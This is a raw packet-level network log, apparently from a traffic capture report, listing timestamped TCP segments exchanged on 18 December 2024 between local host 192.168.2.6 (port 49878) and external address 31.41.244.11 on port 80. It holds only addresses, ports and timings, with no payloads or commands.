                                                                                                                                                              Dec 18, 2024 11:47:48.906631947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.907730103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.907776117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.907799959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.907838106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.908797979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.908843040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.909082890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.909118891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.910044909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.910057068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.910094976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.910129070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.911267042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.911293030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.911360025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.911360025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.912401915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.912441015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.912627935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.912682056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.913630962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.913655043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.913702011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.914696932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.914715052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.914742947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.914761066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.915931940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.915967941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.915977001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.916007996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.917162895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.917175055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.917198896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.917217016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.918533087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.918549061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.918570042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.918601036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.919478893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.919522047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.919580936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.919621944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.921150923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.921163082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.921189070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.921216965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.921902895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.921941996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.088915110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.088958025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.089020967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.089020967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.089545965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.089580059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.089601040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.089618921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.089696884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.089745045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.090966940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.091011047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.091027021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.091051102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.092093945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.092129946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.092150927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.092173100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.093297005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.093353987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.093595982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.093647957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.094513893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.094564915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.094672918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.094718933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.095531940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.095567942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.095582962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.095607996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.096621990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.096656084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.096673012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.096693993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.097748041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.097784042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.097800016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.097821951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.099462986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.099502087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.099510908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.099539995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.100194931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.100234985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.100239038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.100274086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.101672888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.101711035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.101726055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.101748943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.102667093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.102727890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.103163004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.103204012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.103880882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.103918076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.103962898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.105325937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.105362892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.105389118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.105410099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.106836081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.106878042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.106914997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.106940985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.107810020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.107845068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.107887983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.108818054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.108853102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.108870983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.108889103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.109541893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.109576941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.109594107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.109613895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.110702991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.110749960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.110805035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.110851049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.112369061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.112401962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.112435102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.112448931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.113581896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.113631964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.113810062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.113853931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.114684105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.114718914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.114757061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.116151094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.116190910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.116211891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.116233110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.116997004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.117032051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.117058039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.118083000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.118119001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.118145943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.118294001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.118340969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.119174957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.119213104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.119230986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.119252920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.120697975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.120735884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.120759010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.120771885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.121247053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.121282101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.121289015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.121320009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.122994900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.123029947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.123075962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.123075962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.123836994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.123872995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.123929977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.124800920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.124839067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.124850988 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.124878883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.126197100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.126236916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.126261950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.126272917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.127279997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.127326965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.127351999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.127393961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.129143953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.129185915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.129209042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.129220009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.130598068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.130640984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.130666018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.130676985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.131200075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.131242990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.131294012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.132617950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.132663965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.132731915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.134040117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.134056091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.134097099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.134111881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.134969950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.134987116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.135031939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.135819912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.136049986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.136102915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.137068033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.137079954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.137105942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.137121916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.138115883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.138128042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.138163090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.139045000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.139059067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.139126062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.139126062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.139982939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.139996052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.140043020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.141403913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.141416073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.141462088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.141484976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.142398119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.142663956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.142720938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.143418074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.143430948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.143472910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.144594908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.144609928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.144634962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.144654989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.145807028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.145819902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.145869017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.145883083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.146869898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.146897078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.146929026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.146949053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.148087025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.148099899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.148154974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.149493933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.149507046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.149559975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.149584055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.280071020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.280087948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.280155897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.280891895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.280905008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.280915976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.280957937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.280991077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.282416105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.282471895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.283302069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.283350945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.283449888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.283503056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.284038067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.284085035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.284693956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.284706116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.284754992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.285624981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.285635948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.285672903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.285717010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.286700010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.286751986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.286778927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.286983967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.287766933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.287787914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.287811995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.287826061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.289374113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.289402962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.289433002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.289449930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.290102959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.290152073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.291014910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.291062117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.291912079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.291929007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.291960955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.291985035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.292453051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.292496920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.293606043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.293651104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.293653965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.293684006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.294744015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.294787884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.294800997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.294816971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.295198917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.295238972 CET4987880192.168.2.631.41.244.11
